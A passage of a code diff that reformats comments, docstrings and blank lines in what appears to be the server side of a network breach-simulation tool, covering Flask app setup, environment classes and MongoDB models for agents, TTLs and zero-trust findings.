"monkey_path":WormConfiguration.dropper_target_path_win_64}
+ monkey_options
)

View File

@ -62,11 +62,13 @@ def serve_static_file(static_path):
try:
return send_from_directory(os.path.join(MONKEY_ISLAND_ABS_PATH, "cc/ui/dist"), static_path)
except NotFound:
# Because react uses various urls for same index page, this is probably the user's intention.
# Because react uses various urls for same index page, this is probably the user's
# intention.
if static_path == HOME_FILE:
flask_restful.abort(
Response(
"Page not found. Make sure you ran the npm script and the cwd is monkey\\monkey.",
"Page not found. Make sure you ran the npm script and the cwd is "
"monkey\\monkey.",
500,
)
)
@ -82,11 +84,13 @@ def init_app_config(app, mongo_url):
# See https://flask-jwt-extended.readthedocs.io/en/stable/options
app.config["JWT_ACCESS_TOKEN_EXPIRES"] = env_singleton.env.get_auth_expiration_time()
# Invalidate the signature of JWTs if the server process restarts. This avoids the edge case of getting a JWT,
# Invalidate the signature of JWTs if the server process restarts. This avoids the edge case
# of getting a JWT,
# deciding to reset credentials and then still logging in with the old JWT.
app.config["JWT_SECRET_KEY"] = str(uuid.uuid4())
# By default, Flask sorts keys of JSON objects alphabetically, which messes with the ATT&CK matrix in the
# By default, Flask sorts keys of JSON objects alphabetically, which messes with the ATT&CK
# matrix in the
# configuration. See https://flask.palletsprojects.com/en/1.1.x/config/#JSON_SORT_KEYS.
app.config["JSON_SORT_KEYS"] = False
@ -101,7 +105,8 @@ def init_app_services(app):
database.init()
Database.init_db()
# If running on AWS, this will initialize the instance data, which is used "later" in the execution of the island.
# If running on AWS, this will initialize the instance data, which is used "later" in the
# execution of the island.
RemoteRunAwsService.init()

View File

@ -5,7 +5,6 @@ __author__ = "itay.mizeretz"
class AwsEnvironment(Environment):
_credentials_required = True
def __init__(self, config):

View File

@ -4,7 +4,6 @@ __author__ = "itay.mizeretz"
class PasswordEnvironment(Environment):
_credentials_required = True
def get_auth_users(self):

View File

@ -5,7 +5,6 @@ __author__ = "itay.mizeretz"
class StandardEnvironment(Environment):
_credentials_required = False
# SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'

View File

@ -4,7 +4,8 @@ from monkey_island.cc.environment import Environment, EnvironmentConfig
class TestingEnvironment(Environment):
"""
Use this environment for running Unit Tests.
This will cause all mongo connections to happen via `mongomock` instead of using an actual mongodb instance.
This will cause all mongo connections to happen via `mongomock` instead of using an actual
mongodb instance.
"""
_credentials_required = True

View File

@ -5,7 +5,8 @@ import time
from pathlib import Path
from threading import Thread
# Add the monkey_island directory to the path, to make sure imports that don't start with "monkey_island." work.
# Add the monkey_island directory to the path, to make sure imports that don't start with
# "monkey_island." work.
from gevent.pywsgi import WSGIServer
MONKEY_ISLAND_DIR_BASE_PATH = str(Path(__file__).parent.parent)
@ -48,7 +49,6 @@ def main(should_setup_only=False, server_config_filename=DEFAULT_SERVER_CONFIG_P
def start_island_server(should_setup_only):
mongo_url = os.environ.get("MONGO_URL", env_singleton.env.get_mongo_url())
wait_for_mongo_db_server(mongo_url)
assert_mongo_db_version(mongo_url)

View File

@ -4,7 +4,8 @@ import monkey_island.cc.environment.environment_singleton as env_singleton
from .command_control_channel import CommandControlChannel # noqa: F401
# Order of importing matters here, for registering the embedded and referenced documents before using them.
# Order of importing matters here, for registering the embedded and referenced documents before
# using them.
from .config import Config # noqa: F401
from .creds import Creds # noqa: F401
from .monkey import Monkey # noqa: F401

View File

@ -8,7 +8,6 @@ from monkey_island.cc.services.attack.test_mitre_api_interface import MitreApiIn
class AttackMitigations(Document):
COLLECTION_NAME = "attack_mitigations"
technique_id = StringField(required=True, primary_key=True)

View File

@ -5,7 +5,6 @@ from monkey_island.cc.services.attack.test_mitre_api_interface import MitreApiIn
class Mitigation(EmbeddedDocument):
name = StringField(required=True)
description = StringField(required=True)
url = StringField()

View File

@ -2,7 +2,6 @@ from mongoengine import BooleanField, Document, DynamicField, ListField, ObjectI
class Edge(Document):
meta = {"allow_inheritance":True}
# SCHEMA

View File

@ -26,8 +26,10 @@ MAX_MONKEYS_AMOUNT_TO_CACHE = 100
class Monkey(Document):
"""
This class has 2 main section:
* The schema section defines the DB fields in the document. This is the data of the object.
* The logic section defines complex questions we can ask about a single document which are asked multiple
* The schema section defines the DB fields in the document. This is the data of the
object.
* The logic section defines complex questions we can ask about a single document which
are asked multiple
times, somewhat like an API.
"""
@ -42,7 +44,8 @@ class Monkey(Document):
ip_addresses = ListField(StringField())
keepalive = DateTimeField()
modifytime = DateTimeField()
# TODO make "parent" an embedded document, so this can be removed and the schema explained (and validated) verbosely.
# TODO make "parent" an embedded document, so this can be removed and the schema explained (
# and validated) verbosely.
# This is a temporary fix, since mongoengine doesn't allow for lists of strings to be null
# (even with required=False of null=True).
# See relevant issue: https://github.com/MongoEngine/mongoengine/issues/1904
@ -146,7 +149,8 @@ class Monkey(Document):
return {"ips":self.ip_addresses, "hostname":self.hostname}
@ring.lru(
expire=1 # data has TTL of 1 second. This is useful for rapid calls for report generation.
expire=1
# data has TTL of 1 second. This is useful for rapid calls for report generation.
)
@staticmethod
def is_monkey(object_id):

View File

@ -7,10 +7,12 @@ class MonkeyTtl(Document):
"""
This model represents the monkey's TTL, and is referenced by the main Monkey document.
See https://docs.mongodb.com/manual/tutorial/expire-data/ and
https://stackoverflow.com/questions/55994379/mongodb-ttl-index-doesnt-delete-expired-documents/56021663#56021663
https://stackoverflow.com/questions/55994379/mongodb-ttl-index-doesnt-delete-expired
-documents/56021663#56021663
for more information about how TTL indexing works and why this class is set up the way it is.
If you wish to use this class, you can create it using the create_ttl_expire_in(seconds) function.
If you wish to use this class, you can create it using the create_ttl_expire_in(seconds)
function.
If you wish to create an instance of this class directly, see the inner implementation of
create_ttl_expire_in(seconds) to see how to do so.
"""
@ -20,11 +22,13 @@ class MonkeyTtl(Document):
"""
Initializes a TTL object which will expire in expire_in_seconds seconds from when created.
Remember to call .save() on the object after creation.
:param expiry_in_seconds: How long should the TTL be in the DB, in seconds. Please take into consideration
:param expiry_in_seconds: How long should the TTL be in the DB, in seconds. Please take
into consideration
that the cleanup thread of mongo might take extra time to delete the TTL from the DB.
"""
# Using UTC to make the mongodb TTL feature work. See
# https://stackoverflow.com/questions/55994379/mongodb-ttl-index-doesnt-delete-expired-documents.
# https://stackoverflow.com/questions/55994379/mongodb-ttl-index-doesnt-delete-expired
# -documents.
return MonkeyTtl(expire_at=datetime.utcnow() + timedelta(seconds=expiry_in_seconds))
meta = {"indexes":[{"name":"TTL_index", "fields":["expire_at"], "expireAfterSeconds":0}]}
@ -35,7 +39,8 @@ class MonkeyTtl(Document):
def create_monkey_ttl_document(expiry_duration_in_seconds):
"""
Create a new Monkey TTL document and save it as a document.
:param expiry_duration_in_seconds: How long should the TTL last for. THIS IS A LOWER BOUND - depends on mongodb
:param expiry_duration_in_seconds: How long should the TTL last for. THIS IS A LOWER BOUND -
depends on mongodb
performance.
:return: The TTL document. To get its ID use `.id`.
"""

View File

@ -26,7 +26,8 @@ class TestMonkey:
mia_monkey_ttl.save()
mia_monkey = Monkey(guid=str(uuid.uuid4()), dead=False, ttl_ref=mia_monkey_ttl.id)
mia_monkey.save()
# Emulate timeout - ttl is manually deleted here, since we're using mongomock and not a real mongo instance.
# Emulate timeout - ttl is manually deleted here, since we're using mongomock and not a
# real mongo instance.
sleep(1)
mia_monkey_ttl.delete()

View File

@ -7,12 +7,15 @@ import common.common_consts.zero_trust_consts as zero_trust_consts
class Event(EmbeddedDocument):
"""
This model represents a single event within a Finding (it is an EmbeddedDocument within Finding). It is meant to
This model represents a single event within a Finding (it is an EmbeddedDocument within
Finding). It is meant to
hold a detail of the Finding.
This class has 2 main section:
* The schema section defines the DB fields in the document. This is the data of the object.
* The logic section defines complex questions we can ask about a single document which are asked multiple
* The schema section defines the DB fields in the document. This is the data of the
object.
* The logic section defines complex questions we can ask about a single document which
are asked multiple
times, or complex action we will perform - somewhat like an API.
"""

View File

@ -12,20 +12,24 @@ import common.common_consts.zero_trust_consts as zero_trust_consts
class Finding(Document):
"""
This model represents a Zero-Trust finding: A result of a test the monkey/island might perform to see if a
This model represents a Zero-Trust finding: A result of a test the monkey/island might
perform to see if a
specific principle of zero trust is upheld or broken.
Findings might have the following statuses:
Failed
Meaning that we are sure that something is wrong (example: segmentation issue).
Verify
Meaning that we need the user to check something himself (example: 2FA logs, AV missing).
Meaning that we need the user to check something himself (example: 2FA logs,
AV missing).
Passed
Meaning that we are sure that something is correct (example: Monkey failed exploiting).
This class has 2 main section:
* The schema section defines the DB fields in the document. This is the data of the object.
* The logic section defines complex questions we can ask about a single document which are asked multiple
* The schema section defines the DB fields in the document. This is the data of the
object.
* The logic section defines complex questions we can ask about a single document which
are asked multiple
times, or complex action we will perform - somewhat like an API.
"""

View File

@ -8,7 +8,6 @@ from monkey_island.cc.models.zero_trust.event import Event
class MonkeyFindingDetails(Document):
# SCHEMA
events = EmbeddedDocumentListField(document_type=Event, required=False)

Some files were not shown because too many files have changed in this diff Show More